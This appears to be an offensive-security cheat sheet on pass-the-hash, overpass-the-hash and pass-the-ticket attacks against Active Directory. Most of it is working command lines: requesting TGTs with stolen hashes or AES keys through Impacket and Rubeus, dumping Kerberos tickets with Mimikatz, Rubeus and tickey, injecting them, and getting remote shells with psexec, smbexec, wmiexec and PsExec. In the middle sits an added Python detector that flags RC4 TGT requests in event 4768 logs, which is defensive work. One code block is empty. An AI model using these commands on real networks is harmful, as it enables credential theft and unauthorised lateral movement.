# Use Alternate Authentication Material

## Application Access Token

## Pass the Hash

### Overpass The Hash/Pass The Key (PTK)

#### Impacket

Request the TGT with hash

```
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
```

Request the TGT with an AES key (stronger encryption, and probably stealthier because it is the type Microsoft uses by default)

```
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
```

Request the TGT with password

```
python getTGT.py <domain_name>/<user_name>:[password]
```

Set the TGT for Impacket use

```
export KRB5CCNAME=<TGT_ccache_file>
```

Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### Rubeus and PsExec

Request and inject the ticket

```
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
```

Execute a cmd on the remote machine

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```
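
From the defender's side, a TGT requested with an NTLM hash (`-hashes`, `/rc4`) is recorded by the domain controller as event 4768 with RC4-HMAC (`0x17`) as the ticket encryption type. The following is an added detection example, not part of the original page or of any tool it mentions; the field names follow event 4768, while the JSON-lines export format and the sample events are constructed assumptions.

```python
import json
from collections import defaultdict

AES_ETYPES = {"0x11", "0x12"}   # AES128 / AES256 (CTS-HMAC-SHA1-96)
RC4_ETYPE = "0x17"              # RC4-HMAC, whose key is the NT hash itself

# Constructed sample: event 4768 records exported as JSON lines (assumed format).
SAMPLE_LOG = """\
{"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "svc_legacy", "IpAddress": "::ffff:10.0.0.30", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4769, "TargetUserName": "alice", "IpAddress": "::ffff:10.0.0.21", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:10.0.0.22", "TicketEncryptionType": "0xffffffff", "Status": "0x18"}
truncated line that is not JSON
{"EventID": 4768, "TargetUserName": "Alice", "IpAddress": "::ffff:10.0.0.99", "TicketEncryptionType": "0x17", "Status": "0x0"}
"""

def parse_events(text):
    """Yield successful 4768 (TGT requested) events, skipping malformed lines."""
    for line in text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and ev.get("EventID") == 4768 and ev.get("Status") == "0x0":
            yield ev

def find_rc4_tgt_requests(events):
    """Return (account, source_ip, verdict) for every RC4 TGT request.

    verdict is "downgrade" when the same account also obtains AES TGTs
    anywhere in the data set (order independent), otherwise "rc4-only".
    """
    seen = defaultdict(set)          # account -> etypes observed
    rc4_hits = []
    for ev in events:
        user = str(ev.get("TargetUserName", "")).lower()
        etype = str(ev.get("TicketEncryptionType", "")).lower()
        seen[user].add(etype)
        if etype == RC4_ETYPE:
            ip = str(ev.get("IpAddress", "")).replace("::ffff:", "")
            rc4_hits.append((user, ip))
    return [(u, ip, "downgrade" if seen[u] & AES_ETYPES else "rc4-only")
            for u, ip in rc4_hits]

if __name__ == "__main__":
    for user, ip, verdict in find_rc4_tgt_requests(parse_events(SAMPLE_LOG)):
        print(f"{verdict:10} account={user} source={ip}")
```

Accounts flagged `rc4-only` may be legitimate legacy systems, while `downgrade` means the same account normally receives AES tickets. A request made with an AES key logs an AES encryption type like a normal logon, so this check does not cover it.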

## Pass the Ticket

### Pass The Ticket (PTT)

#### Harvest tickets from Linux

* Check type and location of tickets:

  ```
  grep default_ccache_name /etc/krb5.conf
  ```
* If nothing is returned, the default is `FILE:/tmp/krb5cc_%{uid}`.
* For file tickets, you can copy them (if you have permissions) in order to use them.
* For `KEYRING` tickets, you can use [tickey](https://github.com/TarlogicSecurity/tickey) to get them:

```
cp tickey /tmp/tickey
```

```
/tmp/tickey -i
```

#### Harvest tickets from Windows

With [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # sekurlsa::tickets /export
```

With [Rubeus](https://github.com/GhostPack/Rubeus) in PowerShell:

```
.\Rubeus dump
```

After dumping tickets with Rubeus in base64, write them to a file:

```
```

To convert tickets between Linux/Windows format with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter):

```
python ticket_converter.py ticket.kirbi ticket.ccache
```

```
python ticket_converter.py ticket.ccache ticket.kirbi
```

#### Using ticket in Linux

Set the ticket for Impacket use

```
export KRB5CCNAME=<TGT_ccache_file_path>
```

Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

```
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### Using ticket in Windows

Inject ticket with [Mimikatz](https://github.com/gentilkiwi/mimikatz):

```
mimikatz # kerberos::ptt <ticket_kirbi_file>
```

Inject ticket with [Rubeus](https://github.com/GhostPack/Rubeus):

```
.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
```

Execute a cmd on the remote machine with [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec):

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

## Web Session Cookie


